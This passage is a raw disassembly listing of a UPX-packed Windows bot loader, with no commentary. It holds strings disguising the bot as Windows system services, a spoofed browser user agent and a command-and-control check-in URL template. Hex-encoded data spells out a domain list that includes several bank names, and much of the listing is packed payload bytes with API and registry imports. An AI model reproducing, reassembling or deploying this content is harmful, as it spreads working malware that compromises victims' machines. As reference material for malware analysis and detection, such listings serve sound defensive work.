aMsConfigV13 db 'MS Config v13',0 ; DATA XREF: sub_310023C8+4E�o
align 4
aAvserve2_exeup db 'avserve2.exeUpdate Service',0 ; DATA XREF: sub_310023C8+47�o
align 10h
aAvserve_exe db 'avserve.exe',0 ; DATA XREF: sub_310023C8+40�o
aWindowsUpdateS db 'Windows Update Service',0 ; DATA XREF: sub_310023C8+39�o
align 4
aWinupdate db 'WinUpdate',0 ; DATA XREF: sub_310023C8+32�o
align 10h
aSystray db 'SysTray',0 ; DATA XREF: sub_310023C8+2B�o
aBotLoader db 'Bot Loader',0 ; DATA XREF: sub_310023C8+24�o
align 4
aSystemRestoreS db 'System Restore Service',0 ; DATA XREF: sub_310023C8+1D�o
align 4
aDiskDefragment db 'Disk Defragmenter',0 ; DATA XREF: sub_310023C8+16�o
align 10h
aWindowsSecurit db 'Windows Security Manager',0 ; DATA XREF: sub_310023C8+F�o
align 4
asc_31004CAC: ; DATA XREF: sub_31002476+56�o
; sub_310026A6+49�o
unicode 0, <\>,0
a1: ; DATA XREF: sub_31002542+B7�o
unicode 0, <1>,0
dword_31004CB4 dd 206h, 2400h, 31415352h, 180h, 10001h, 11838DF5h, 2AEC5279h
; DATA XREF: sub_31002928+B9�o
dd 0E7F63AE4h, 0E0EA9B49h, 0DB21AFBEh, 1A95447Eh, 0A032615Eh
dd 9F6A1F85h, 3994FF94h, 8F26A684h, 5C1DCE35h, 0B20BC9A5h
aZer0_0 db 'zer0',0 ; DATA XREF: sub_31002A44+BF�o
align 10h
aMozilla4_0Co_0 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: sub_31002A44+84�o
align 4
byte_31004D34 db 1 ; DATA XREF: UPX0:31002B45�r
off_31004D35 dd offset dword_31004ED0 ; DATA XREF: UPX0:31002B4D�r
db 1, 0C0h, 4Eh
dd 0B0013100h, 131004Eh, 31004EA0h, 4E8C00h, 4E7C0131h
dd 6C013100h, 31004Eh, 31004E60h, 4E5401h, 4E440131h, 34003100h
dd 131004Eh, 31004E28h, 4E1C01h, 4E100131h, 8013100h, 131004Eh
dd 31004DF8h, 4DE801h, 4DD40131h, 0C4013100h, 131004Dh
dd 31004DBCh, 4DB001h, 4DA40131h, 3100h, 68746566h, 2E647261h
dd 7A6962h, 6B636168h, 2E737265h, 766Ch, 2E767663h, 7572h
dd 2E777777h, 6C646572h, 2E656E69h, 7572h, 69766F6Ch, 646F676Eh
dd 736F682Eh, 6B732E74h, 0
dd 656C6966h, 72616573h, 722E6863h, 75h, 646C6F67h, 61736E65h
dd 722E646Eh, 75h, 6B637566h, 75722Eh, 6F646170h, 2E696B6Eh
dd 67726Fh, 6A6F7274h, 722E6E61h, 75h, 63657361h, 2E616B68h
dd 7572h, 7473616Dh, 782D7265h, 6D6F632Eh, 0
dd 6F6C6F63h, 61622D72h, 722E6B6Eh, 75h, 6B76616Bh, 722E7A61h
dd 75h, 74757263h, 6E2E706Fh, 75h, 6F64696Bh, 61622D73h
dd 722E6B6Eh, 75h, 65726170h, 61622D78h, 722E6B6Eh, 75h
dd 6C756461h, 6D652D74h, 65726970h, 6D6F632Eh, 0
dd 666E6F6Bh, 616B7369h, 726F2E74h, 67h, 69746963h, 6E61622Dh
dd 75722E6Bh, 0
dd 72617778h, 6A632E65h, 656E2E62h, 74h
dword_31004ED0 dd 617A616Dh, 616B6166h, 75722Eh ; DATA XREF: UPX0:off_31004D35�o
aMozilla4_0Comp db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: sub_310026A6+13�o
align 10h
aAbcdefghijkl_0 db 'abcdefghijklmnopqrstuvwxyz',0 ; DATA XREF: sub_3100281C+1C�o
align 4
aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0 ; DATA XREF: sub_3100281C+C�o
align 4
aZer0 db 'zer0',0 ; DATA XREF: sub_31002928+B�o
align 10h
aHttpS db 'http://%s',0 ; DATA XREF: sub_31002A44+71�o
align 4
aHttpSIndex_php db 'http://%s/index.php?id=%s?scn=%d?inf=%d?ver=13?cnt=%s',0
; DATA XREF: sub_31002A44+57�o
align 4
dd 9 dup(0)
dword_31004FB8 dd 0 ; DATA XREF: sub_31001ADF+C7�r
; sub_31001C18+80�w
dword_31004FBC dd 0 ; DATA XREF: sub_31001C18+2D�w
; sub_31002A44+43�r
dword_31004FC0 dd 0 ; DATA XREF: sub_31001ADF+79�r
; sub_31001ADF:loc_31001B8D�r ...
dword_31004FC4 dd 44h ; DATA XREF: sub_31001851+C2�r
; UPX0:31001DB0�w ...
dword_31004FC8 dd 0 ; DATA XREF: sub_31001DF2+2�r
; sub_31001E06+33�w
dword_31004FCC dd 0 ; DATA XREF: sub_31001C18+E0�w
; sub_310020F4+20�r
dword_31004FD0 dd 31000000h ; DATA XREF: sub_31001851+6�r
; UPX0:31001D95�w
dword_31004FD4 dd 0 ; DATA XREF: sub_31001FA5+37�o
; sub_3100202D+53�o ...
dword_31004FD8 dd 0 ; DATA XREF: UPX0:31002191�w
; UPX0:310021A3�w
word_31004FDC dw 0 ; DATA XREF: sub_31001F41+3B�r
; sub_31001FA5:loc_31002006�r ...
align 10h
dword_31004FE0 dd 0 ; DATA XREF: sub_31002542+25�w
; sub_31002542+110�w
align 20h
UPX0 ends
; Section 2. (virtual address 00005000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 00005000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX1 segment para public 'CODE' use32
assume cs:UPX1
;org 31005000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_31005000 dd 0C4h, 40h, 74654701h, 61636F4Ch, 6E49656Ch, 416F66h
; DATA XREF: UPX1:31006AD1�o
dd 69725701h, 69466574h, 100656Ch, 74726956h, 466C6175h
dd 656572h, 72695601h, 6C617574h, 6F6C6C41h, 47010063h
dd 6F4D7465h, 656C7564h, 656C6946h, 656D614Eh, 6C010041h
dd 63727473h, 4169706Dh, 65470100h, 73795374h, 446D6574h
dd 63657269h, 79726F74h, 6C010041h, 63727473h, 417461h
dd 706F4301h, 6C694679h, 1004165h, 456E6957h, 636578h
dd 65724301h, 54657461h, 686C6F6Fh, 33706C65h, 616E5332h
dd 6F687370h, 50010074h, 65636F72h, 32337373h, 73726946h
dd 54010074h, 696D7265h, 6574616Eh, 636F7250h, 737365h
dd 6F725001h, 73736563h, 654E3233h, 1007478h, 7274736Ch
dd 41797063h, 736C0100h, 656C7274h, 100416Eh, 65656C53h
dd 6C010070h, 63727473h, 416E7970h, 65470100h, 72754374h
dd 746E6572h, 636F7250h, 737365h, 74654701h, 636F7250h
dd 72646441h, 737365h, 616F4C01h, 62694C64h, 79726172h
dd 57010041h, 65746972h, 636F7250h, 4D737365h, 726F6D65h
dd 43010079h, 65736F6Ch, 646E6148h, 100656Ch, 6E65704Fh
dd 636F7250h, 737365h, 74654701h, 75646F4Dh, 6148656Ch
dd 656C646Eh, 47010041h, 69547465h, 6F436B63h, 746E75h
dd 65724301h, 4D657461h, 78657475h, 43010041h, 74616572h
dd 72685465h, 646165h, 65724301h, 50657461h, 65636F72h
dd 417373h, 74655301h, 6E657645h, 4F010074h, 456E6570h
dd 746E6576h, 45010041h, 54746978h, 61657268h, 52010064h
dd 46646165h, 656C69h, 74654701h, 656C6946h, 657A6953h
dd 72430100h, 65746165h, 656C6946h, 45010041h, 50746978h
dd 65636F72h, 1007373h, 4C746547h, 45747361h, 726F7272h
dd 65440100h, 6574656Ch, 656C6946h, 57010041h, 46746961h
dd 6953726Fh, 656C676Eh, 656A624Fh, 1007463h, 61657243h
dd 76456574h, 41746E65h, 6E490100h, 6C726574h, 656B636Fh
dd 636E4964h, 656D6572h, 746Eh, 0D1h, 0
dd 67655201h, 61657243h, 654B6574h, 41784579h, 65520100h
dd 74655367h, 756C6156h, 41784565h, 65520100h, 65755167h
dd 61567972h, 4565756Ch, 1004178h, 4F676552h, 4B6E6570h
dd 78457965h, 52010041h, 65446765h, 6574656Ch, 756C6156h
dd 1004165h, 43676552h, 65736F6Ch, 79654Bh, 6F624101h
dd 79537472h, 6D657473h, 74756853h, 6E776F64h, 43010041h
dd 74707972h, 61657243h, 61486574h, 1006873h, 70797243h
dd 73614874h, 74614468h, 43010061h, 74707972h, 69726556h
dd 69537966h, 74616E67h, 41657275h, 72430100h, 44747079h
dd 72747365h, 6148796Fh, 1006873h, 70797243h, 73654474h
dd 796F7274h, 79654Bh, 79724301h, 65527470h, 7361656Ch
dd 6E6F4365h, 74786574h, 72430100h, 41747079h, 69757163h
dd 6F436572h, 7865746Eh, 1004174h, 70797243h, 706D4974h
dd 4B74726Fh, 7965h, 0DEh, 0E8h, 6D656D01h, 706D63h, 72747301h
dd 726863h, 78655F01h, 74706563h, 6E61685Fh, 72656C64h
dd 73010033h, 74737274h, 72010072h, 646E61h, 61727301h
dd 100646Eh, 636D656Dh, 1007970h, 6C727473h, 1006E65h
dd 736D656Dh, 7465h, 0E9h, 110h, 6E694601h, 6E695764h
dd 41776F64h, 65470100h, 726F4674h, 6F726765h, 57646E75h
dd 6F646E69h, 47010077h, 69577465h, 776F646Eh, 65726854h
dd 72506461h, 7365636Fh, 644973h, 70737701h, 746E6972h
dd 4166h, 0F4h, 124h, 746E4901h, 656E7265h, 61655274h
dd 6C694664h, 49010065h, 7265746Eh, 4F74656Eh, 556E6570h
dd 416C72h, 746E4901h, 656E7265h, 65704F74h, 100416Eh
dd 65746E49h, 74656E72h, 736F6C43h, 6E614865h, 656C64h
dd 746E4901h, 656E7265h, 74654774h, 6E6E6F43h, 65746365h
dd 61745364h, 6574h, 100h, 13Ch, 0FF0073FFh, 0DFF0002h
dd 1FF00h, 0FF0039FFh, 34FF006Fh, 17FF00h, 0FF000CFFh
dd 4FF0009h, 13FF00h, 0FF0010FFh, 3FF0016h, 0
dd 45500000h, 14C0000h, 87140002h, 40D0h, 0
dd 0E00000h, 10B010Fh, 24000006h, 10000000h, 0
dd 1D880000h, 10000000h, 40000000h, 0
dd 10003100h, 2000000h, 40000h, 0
dd 40000h, 0
dd 50000000h, 4000000h, 0
dd 20000h, 0
dd 10000010h, 0
dd 10000010h, 0
dd 100000h, 2 dup(0)
dd 2BF00000h, 8C0000h, 14h dup(0)
dd 10000000h, 17C0000h, 6 dup(0)
dd 742E0000h, 747865h, 23060000h, 10000000h, 24000000h
dd 4000000h, 3 dup(0)
dd 200000h, 642EE004h, 617461h, 0FE40000h, 40000000h, 10000000h
dd 28000000h, 3 dup(0)
dd 400000h, 4000C000h, 2DF80000h, 44B60000h, 274D0000h
dd 0F2150DB6h, 0E113C4EBh, 0B2793772h, 68158743h, 68030B84h
dd 166DAC80h, 2D2F8A6Bh, 0F4624753h, 4553EB31h, 9A17BC76h
dd 8B3E3423h, 3038C8C2h, 0E1FB5701h, 58E73ED9h, 3604D0C9h
dd 294BA468h, 0A95D0DEEh, 6806D1DBh, 1D89805Bh, 44B09FBCh
dd 122776DBh, 0B314DF60h, 0B05DF2C7h, 5614DDADh, 27B5353h
dd 80113A01h, 0D1FC735h, 0F029C804h, 1A40FE83h, 9A51B3ECh
dd 0C4C02274h, 4C46C0A3h, 16FDE978h, 0F1A3597Ch, 5153FC97h
dd 674B6249h, 0C03A796Bh, 0E126565Bh, 0EC3370FBh, 0C2580C5Eh
dd 499AF810h, 0B35E69A8h, 0E80C3E56h, 5E93BFB7h, 0EC5D89h
dd 0FF25FF05h, 0C33A041Fh, 0DD837FA1h, 7443CCA3h, 0CC8A12E7h
dd 0DF74C984h, 0A3645E50h, 42EA26F4h, 154098F5h, 58C2DD32h
dd 6E440C64h, 0F4D7D1FDh, 0D807F85Fh, 6891481Fh, 38501ADFh
dd 0AF0867FBh, 0E2EB5959h, 455FCF53h, 97305987h, 70019043h
dd 0EB36D0A1h, 0B0333C5Eh, 23E11D6h, 0F4C1E60Ah, 802DD6D9h
dd 304526A0h, 0A3541B63h, 7CD4E0D0h, 603B19B0h, 1AC4A36Eh
dd 0D9B73DD0h, 52C13B3Dh, 729CC45h, 0C41304C5h, 0BEC71C95h
dd 6683E15h, 4D08131Eh, 0FD8D26A5h, 0B5FAEDAh, 6999020Eh
dd 0D844C835h, 5834F0BBh, 6A26402Ch, 7F1180A1h, 0B2EAFF7Ah
dd 0A1642BD0h, 8964508Ah, 0B36C0725h, 68C3C772h, 388F9758h
dd 0AD816CDCh, 843A3D7h, 674BA8FCh, 7F603203h, 4C7AB0Ah
dd 400B4824h, 9A40643Ch, 38860927h, 40643D34h, 592C3006h
dd 0F07CC339h, 3974080Bh, 2C4B2468h, 60F7C590h, 4B1CB632h
dd 0DEE1406h, 498485DBh, 0D0A280Ch, 0E49CBB58h, 1C187676h
dd 400A9515h, 3521502Bh, 0C382267Ch, 14EDEE28h, 0D0FA43E3h
dd 888618DDh, 0E3EB2A13h, 81618683h, 3DFF61B2h, 0F0BA3C0Fh
dd 48204615h, 0E4270D67h, 47C2A80h, 2E7FA4D8h, 0B458A51h
dd 0B0E1E92Dh, 32FFEB97h, 43A52DBh, 1CEFC895h, 3831BA5Fh
dd 8825BA5Dh, 13FA0B5Dh, 0B70F5E02h, 0DD19FECFh, 59A4DC35h
dd 0FEF7999Dh, 7352D603h, 0B2EDC3FEh, 0FB80FC65h, 5EBD72FFh
dd 5F766248h, 49ACEC99h, 6833F092h, 15B0D758h, 81084F0Eh
dd 5DD40D0Ah, 36D99863h, 0E0530B09h, 92D90E75h, 0F75B771h
dd 1F41680Ch, 0E93D89BAh, 32DADE41h, 0D703FF84h, 0B1FB8143h
dd 50DBE4C6h, 875F9F17h, 9A030C5Dh, 737BB166h, 6FB3A2E8h
dd 1DEF025Bh, 0FD73812Fh, 2DE6BD04h, 77FEFF9Eh, 0F7887F3Ch
dd 62DB0E9Eh, 3B3123A3h, 3EAADC74h, 0C59D93B0h, 9E57A0A3h
dd 0C89C572Fh, 57112CF6h, 0A51359F8h, 712B712Fh, 75B33CFFh
dd 106873EEh, 64761E27h, 0BED3A60Dh, 70849ED3h, 60CB2C2h
dd 4EDEA9AEh, 60E5AC60h, 508F5099h, 316D7A70h, 8078BA5Ah
dd 0CF6F81DAh, 0BCCBB3Ch, 6068B003h, 35EABC4Bh, 111001B9h
dd 266C40B5h, 8AC077D3h, 0DF0B80C6h, 0B3BC2CC7h, 5655C2C0h
dd 0D4125793h, 63C343E6h, 0A5519402h, 0EC181F0Ch, 0F4FD30E0h
dd 0E25314E3h, 3776CD5Bh, 6A020BF6h, 5DD83850h, 0E87105BAh
dd 96D27FB5h, 9187400h, 0E13B8211h, 510AE60h, 4F001419h
dd 7E1006D8h, 0F010B0A2h, 0D743EAAh, 0C420D553h, 51C73B62h
dd 0DB399210h, 4C3C37D0h, 0ED3A1824h, 117EED85h, 2C202D26h
dd 0EDB0EEDh, 96EF144Dh, 0F2EBA205h, 8324B716h, 0EB65750Dh
dd 4C0B7BDDh, 3F680E94h, 11179C0Dh, 0C06460Bh, 2C382A15h
dd 106EB3BEh, 51B01408h, 17470B65h, 7D5618B7h, 0B8C618B8h
dd 3EF6B1B0h, 0DC743D56h, 676E962Ah, 18FC7516h, 10205014h
dd 3C6B1718h, 6A030859h, 5A550F1Dh, 8BE2CED7h, 4D5662C6h
dd 182C562Eh, 53CEC990h, 27005556h, 2C5ACE59h, 0C520AA6h
dd 9262CF04h, 305D0C03h, 83EA0128h, 0DE5320C3h, 0EDE24EAFh
dd 0F1B5E0Fh, 3CC2948Eh, 4E365C1Eh, 17ADF779h, 6785F07Ch
dd 0C1A4AEE4h, 7ADE2592h, 0D8DB3568h, 0ECEC5F49h, 5C71082h
dd 0C0865020h, 1BEEF134h, 8D477DDEh, 0FC1D1E74h, 0F178BFEFh
dd 745278DEh, 0E0B5FF1Ch, 0F20B9B45h, 0FFFC646h, 7008521Fh
dd 33361C35h, 76D84650h, 39E17BBDh, 38B78973h, 57D00F56h
dd 239103C7h, 4C9076B7h, 7CD4062Ch, 723964D8h, 58DCC8E4h
dd 44E450E0h, 47942CE8h, 20EC1C8Eh, 0F4F404F0h, 69A2794Bh
dd 0A7DB032h, 16BEEBBFh, 80C4C2C7h, 0B7188B05h, 0C8A34497h
dd 75F92EC8h, 0B06C107Dh, 1D2B0E17h, 9A2C0C90h, 8337354Ch
dd 5F75B61Dh, 519C0761h, 74E4781Bh, 0EE98AD09h, 0D3D41887h
dd 0E5636A88h, 9C09FE58h, 0A184435Dh, 3E0831Bh, 8705C083h
dd 0D109D365h, 5CD00952h, 86EEC2Ch, 8C1059B9h, 4CAC683Dh
dd 0E661C30Ah, 140E26DCh, 0CEF1E138h, 6160D982h, 0CC20401Ch
dd 0C8662CB7h, 30B9C6C6h, 0ACC59Bh, 125D4160h, 64146CFAh
dd 73F01F4h, 20E7B7CCh, 0E8795E34h, 7CF45700h, 9F60C1FFh
dd 501FC52Bh, 0BFB14C7h, 25D376E0h, 0E02D52E0h, 0BF501D6Ah
dd 207A71CCh, 51F0E10Ch, 0FE37743Fh, 0AB907B94h, 1FB4BB0Ah
dd 52D103B0h, 0B61D8B53h, 53EEF4C5h, 383D53BCh, 37EE6BC6h
dd 590FEBB1h, 0D82532CEh, 78C8D9B2h, 65E28818h, 1C6F7596h
dd 0B068BB26h, 46E8184Ch, 0CDC2372Eh, 14FEB9BBh, 915EEB72h
dd 12C166A7h, 3310AB4Ch, 31B1BC24h, 0FD3BBBC6h, 90462D2Ch
dd 7E0AE2Dh, 2D8D5948h, 15EB0CE4h, 9AF55960h, 93806472h
dd 0EC0CD7CBh, 331EA783h, 7668CA4Ch, 0C674136Ah, 48115B38h
dd 7BE010DDh, 57EFD4C9h, 0DC68CAE5h, 1B2CEC4Eh, 0BC7EA41Dh
dd 0C0DE3BD8h, 0F0A86317h, 248CF1ECh, 2C3D8B4Bh, 9D9E3017h
dd 0DD72211h, 710E066Ah, 8D7BC676h, 5C0F0584h, 0D1591C59h
dd 598375ACh, 3026DD7h, 62B30114h, 0A740C5F2h, 0F00C3AD9h
dd 0C8152080h, 1E289053h, 3BB5D827h, 0E7511C6h, 0A8C544A3h
dd 517D03BBh, 57E800BFh, 780D1FDDh, 4859B0B4h, 9924FB53h
dd 119F1DB1h, 0F8A756F4h, 2D443353h, 3C92C1BDh, 8A9C05AAh
dd 5C938153h, 0EB9040F1h, 0C6D08B49h, 8702C77h, 7C04E78Bh
dd 40FFCF83h, 7FF0086Ah, 171FFE3h, 8A59F92Bh, 0FF588A10h
dd 0C1D90239h, 0E28004FAh, 0DD542A03h, 0F62FEDFEh, 0A02E3C0h
dd 8AA588D3h, 188A0150h, 221ACAFEh, 6D6EEFD1h, 35716E9h
dd 0F0E32319h, 4646161Ch, 30EE08Dh, 833714FEh, 0BF7C30FAh
dd 0ED593817h, 27BC4FB7h, 122CBE59h, 0F30AE47Dh, 0A4A566A5h
dd 816FF40Fh, 25C81091h, 0DB85100Ch, 2D237DA4h, 0C3A2BE95h
dd 0D3BE0F1Ah, 0E438EC9Ch, 804D5AA5h, 0C8AF2357h, 6FF1BFB6h
dd 0C12B1A38h, 99C30359h, 15448AD0h, 1F23EBE4h, 0E427C2C8h
dd 0EBC8C840h, 83418A03h, 2AAC301Ah, 6EA50786h, 57107E37h
dd 0BA84008Ah, 53618B4Ch, 46A1422Ch, 8A136E05h, 4FBEB1D8h
dd 6041FD0Bh, 18180C08h, 47590788h, 0F6DF6138h, 7C59EDEDh
dd 7F7A050Bh, 83F38C06h, 410A61EEh, 0FED75A0Fh, 4D4120DCh
dd 5BBB7548h, 382A4B64h, 418045A8h, 0FF0B4EA5h, 8B0AB617h
dd 0B60F040Eh, 0C2031114h, 3F98341h, 8E1633F0h, 0C28B3004h
dd 25816122h, 3C994D70h, 0EDFA480Ah, 942301EDh, 0FCF4C001h
dd 0D968D6C9h, 0E90DFF80h, 0D008C183h, 0E0D038F1h, 50285D83h
dd 6CCDE257h, 780D03Ch, 22A6A780h, 0E3BB9BE6h, 0F2261E8h
dd 1E0BBA88h, 0B18D0F1Ah, 0EEBE59ABh, 317E6A47h, 0F6F04DECh
dd 0E982569Bh, 1E8AF760h
dd 5B268065h, 0B2F34C4h, 9DEABEA5h, 8DC4408Ah, 0FA6F0246h
dd 1E88DFB9h, 0FBC1711h, 0BA041908h, 5B014638h, 0F1CB6811h
dd 446A6175h, 1E4C1456h, 0CE15DD98h, 282D8C01h, 4D50306Ah
dd 0C161B98Dh, 2A2F0DFFh, 2753D8F7h, 7DD0124Ch, 330F1B10h
dd 0A27823F5h, 0DB24F159h, 0E042D059h, 5901E805h, 14F00885h
dd 8512C200h, 3B443D18h, 9117076Ah, 566B140h, 3438C6EBh
dd 1A0C3274h, 599B32Ch, 0D405BC72h, 0DA12D7C6h, 4F5CA0D1h
dd 4AC08E79h, 13185CCDh, 0DD19BA2Dh, 0CF736B0h, 4D5F0053h
dd 38D0D0Eh, 8DBF864Eh, 50515326h, 204A9264h, 0BEFB6575h
dd 51A22000h, 0AC750C14h, 4EB40B8h, 0F8227F3Bh, 0D5B1354Ch
dd 4BD26E05h, 7C4E4352h, 0BD3E8D48h, 0DF0309A1h, 7924196Ch
dd 0BA0F8773h, 3230D68Dh, 0F6D64C59h, 8C5725FBh, 348F9ED6h
dd 34B6848Ah, 5269914Dh, 0B6B4FD8Fh, 1A4B4D35h, 0FBD65940h
dd 808A11FCh, 33C54EC4h, 93E0B9D2h, 2FFA9070h, 81F1F708h
dd 61B48C2h, 0FE836800h, 2FF73646h, 0B6EBBA0Eh, 825FFCCh
dd 40561h, 6E09E9BDh, 0EA51CCCCh, 1472E58Dh, 7A5BE981h
dd 2D0BF7ECh, 17018504h, 812BEC73h, 6ECF0CC4h, 0E18B7A5Bh
dd 0CA40768Bh, 10F043C3h, 2322A5E8h, 6C740563h, 8501502Bh
dd 4F7Dh, 0B00A8A3Fh, 6858EB01h, 0CDFFEC74h, 3A7074FFh
dd 32312F2Fh, 31302E37h, 3030383Ah, 652E652Fh, 0DF6578h
dd 8FFEDFFFh, 697A6F4Dh, 2F616C6Ch, 5DDF2734h, 0B966C933h
dd 758D01EEh, 0FFFD8B05h, 8AFEFB6Dh, 7993C06h, 302C0646h
dd 88993446h, 0EDE24707h, 0DAE80AEBh, 2FFDFFBh, 65622E82h
dd 93712E67h, 1201C999h, 0FD91BDFDh, 0BFDD0716h, 72C17FFFh
dd 0FD42AA68h, 10FDAA66h, 0A91C14BAh, 0F3C91A98h, 8608F198h
dd 6EC7FECFh, 10C07102h, 37CB5F90h, 1C965992h, 0E4143A78h
dd 0EC3E4FB6h, 0A7D7157h, 0F345713Ah, 8904F19Dh, 0FBEE748Fh
dd 9C04F109h, 67B34011h, 0B7BFE3F3h, 10F0F63Bh, 0B20BDC1Ch
dd 0C99B6059h, 14D90125h, 0D8F63E59h, 0CA17A104h, 8D2B9E71h
dd 0AD916168h, 1FD9F6B7h, 9666611Ah, 0B228111Dh, 9900C850h
dd 0F6EFDC14h, 5557B6CFh, 0A44E1225h, 491291C0h, 54F7ED99h
dd 6FF67EEEh, 3AC41400h, 3B71CBCAh, 0E424FF1Ch, 0CDCF1A21h
dd 0D9B64FCDh, 2C668FC3h, 0FB1E3F81h, 0DB37CEB0h, 0C383B8FDh
dd 0A85D12CDh, 251DCBC9h, 3FB264ADh, 5A0B24D9h, 0C096A648h
dd 0D9FB1B14h, 294CFF65h, 9CF3EBA7h, 3416E9BAh, 0F57126F4h
dd 0ECFFFBBBh, 3BF90EFCh, 4629EF13h, 0DE5F376Bh, 0A8EC4766h
dd 0F7B016AAh, 0B70137FFh, 0E9EDFFC5h, 0B7FDE9ECh, 12CE1FCh
dd 87DDFEDFh, 0FCFCF5CAh, 0EBFCF25Ah, 0AAF5FCF7h, 34C7D6ABh
dd 0FFB3AAF9h, 0B459FFF2h, 662A2A25h, 9093ACC9h, 9D90B781h
dd 0CDC98363h, 10309271h, 0BFF85F76h, 14513519h, 720A95D9h
dd 0C8712A91h, 0FFFDBFEBh, 12A5D27Fh, 9AE180D5h, 146FAA52h
dd 0C89A2A8Dh, 9A8B12B9h, 5958474Ah, 0DB9BAB9Eh, 0DBEDFFFFh
dd 0EC20A319h, 0BDDDA26Ch, 0DF9EED85h, 0EB81E8A2h, 0C8125544h
dd 0B0961FBDh, 2EFFFCD0h, 0D812EB8Dh, 125A9A85h, 5A9A099Dh
dd 0D096F810h, 9FFBB6F6h, 7F664922h, 8712FEFDh, 95C25AA9h
dd 82128502h, 0B5483F04h, 0CB5A91EDh, 85C7CFF7h, 424D53FFh
dd 9F90BC8Fh, 0C8531872h, 62FEFFh, 0FFF1AD02h, 204350FFh
dd 5754454Eh, 204B524Fh, 474F5250h, 204D4152h, 0FB17CD31h
dd 4CF6B1FFh, 24D4E41h, 6E69570Ah, 73776F64h, 726F6620h
dd 0D6035720h, 6B7F6D2Dh, 756F7267h, 1A330E70h, 234D2761h
dd 0E96C3E5Eh, 32215832h, 312E3232h, 7920544Eh, 18DA6B06h
dd 8B323C20h, 44BB73A4h, 0BA07192Bh, 23FF0Ch, 7D8363h
dd 140A1104h, 1FD40520h, 0D6ED6F5h, 4B4C0069h, 27505353h
dd 0CA76FF97h, 0E00882EAh, 24005792h, 64006Eh, 0B777006Fh
dd 0DCDB17h, 30743A73h, 398C0901h, 25B73000h, 1D2335B2h
dd 0C800072Eh, 0DA1B2273h, 0DA2008ABh, 0C9324CDh, 1039F57h
dd 758360C8h, 47234601h, 73FF4007h, 60F23h, 1F011006h
dd 0E0888A15h, 0E8B70048h, 4FE5FFh, 6A198144h, 49E4F27Ah
dd 30AF281Ch, 215367B3h, 0E16044DFh, 6B75DF5Ch, 304F2DAEh
dd 75C0400h, 8D085ABDh, 5CAF75DCh, 72E4D61h, 2E380036h
dd 8DDB7BAFh, 491B3077h, 43EC00h, 3F3B24h, 61CF201Fh, 8A26463h
dd 0E41E04DCh, 16402DBFh, 0DEDE00FFh, 16000E00h, 3702019Fh
dd 26C24261h, 0DE192840h, 3EFB868h, 0D96C8B11h, 70D374h
dd 0BE429663h, 6B9C2ACBh, 81DD9F25h, 0E10DB3Dh, 541B0448h
dd 0DCFB5413h, 265A75D6h, 5C225963h, 6545CBC7h, 9FF3483Dh
dd 0B000587h, 0B8481003h, 0FFFEB810h, 0B0EEC5Fh, 19286A05h
dd 0D0B10C39h, 0A89B11h, 2ED94FC0h, 0FE17D9F5h, 885D5FC7h
dd 0C91CEB8Ah, 3CE89F11h, 6048102Bh, 22E7C9D1h, 0A3F40C7Bh
dd 30CA060h, 0A05E43C8h, 0CB10Ch, 2393BFEFh, 40880CA0h
dd 0EC000900h, 47B00703h, 95009278h, 7C4F4014h, 0C8BF4070h
dd 6C8A5Eh, 9E134307h, 788FFC27h, 0AB001385h, 13E9A65Bh
dd 8D2FF810h, 0FF409CF1h, 40230EFEh, 41830C1Dh, 88840816h
dd 27DD3E4Fh, 0EE10B943h, 10B801FFh, 661F200Ch, 0DAD2793h
dd 0D80F7F07h, 215E59F2h, 84700118h, 90F9000Fh, 950F8457h
dd 0E4D8000Fh, 7F026FC9h, 0F6C0F84h, 4AADEC00h, 6FA89A78h
dd 93FC1343h, 691F88C0h, 2050586Eh, 6DB37250h, 4600AC0Ah
dd 93390144h, 32C844FCh, 15123C6Bh, 0B2410275h, 53C840D7h
dd 1941C00h, 21CAFFF9h, 5CC606EBh, 5C73255Ch, 24637069h
dd 0BFFF97F9h, 1CEC8166h, 0E4FF07h, 65446553h, 69677562h
dd 656C6976h, 266D6567h, 6441FFFBh, 7473756Ah, 656B6F54h
dd 4C73176Eh, 27F76F6Fh, 707512B9h, 756C6156h, 4F174165h
dd 0FFE02870h, 636FDB62h, 43347324h, 61766461h, 68336970h
dd 0E3C7F88Bh, 72657475h, 5B33316Dh, 0C4AEF665h, 545F11DFh
dd 57796172h, 72431735h, 0ED1A6165h, 52FB773Bh, 56F6D65h
dd 140C6854h, 74726956h, 5BB55875h, 2841B5BBh, 0F78454Fh
dd 356E724Eh, 9E97D1A2h, 1EF3F547h, 50545448h, 4BF7BF7Fh
dd 32203C5Ch, 4B4F2057h, 4B010A0Dh, 0FF666E6Fh, 2446B76h
dd 67044C2Dh, 203A6874h, 5A187525h, 2FCA587Bh, 0B5795428h
dd 6DBD1D26h, 6C70A3DFh, 69856369h, 2D782F15h, 28F42DC7h
dd 6F63FBB6h, 0C972706Dh, 0DB576465h, 7FCADBDDh, 544547FCh
dd 64FE6600h, 6573D311h, 952BFDA1h, 6376736Dh, 0F177D3B1h
dd 16DA2DDh, 320B0865h, 0EB75175Fh, 0DE336696h, 39303103h
dd 9013380Fh, 0D1173E41h, 17303107h, 33645482h, 253AA45Dh
dd 0B59FFF2Fh, 53678D64h, 5754464Fh, 5C455241h, 736F694Dh
dd 583F756Fh, 735C836Ch, 7275435Ch, 0C356C972h, 88B770E2h
dd 525CBE73h, 0FE907875h, 55B430DFh, 64135BA8h, 68736166h
dd 73647A6Eh, 0DAC26C64h, 4953426Eh, 573F6177h, 5B7050AEh
dd 4BF96C0Eh, 25865712h, 49236C4Ch, 3120B16Dh, 0FB43DDDEh
dd 20676966h, 76D7A576h, 326576F8h, 736C979Dh, 532063CFh
dd 1B654410h, 165B991Ah, 172387B2h, 1F858D12h, 737983BFh
dd 0FF42000Ch, 2DC65B20h, 23FD0AD6h, 206D1B13h, 0AC07A14h
dd 374E06B5h, 7B736944h, 3251B6EEh, 672F66AAh, 632A9C6Dh
dd 25B0BFDAh
dd 690A6324h, 4D207974h, 0A71E6E61h, 1AC56317h, 70483185h
dd 1DF8B3FFh, 415352F0h, 78018031h, 11838DF5h, 2AEC5279h
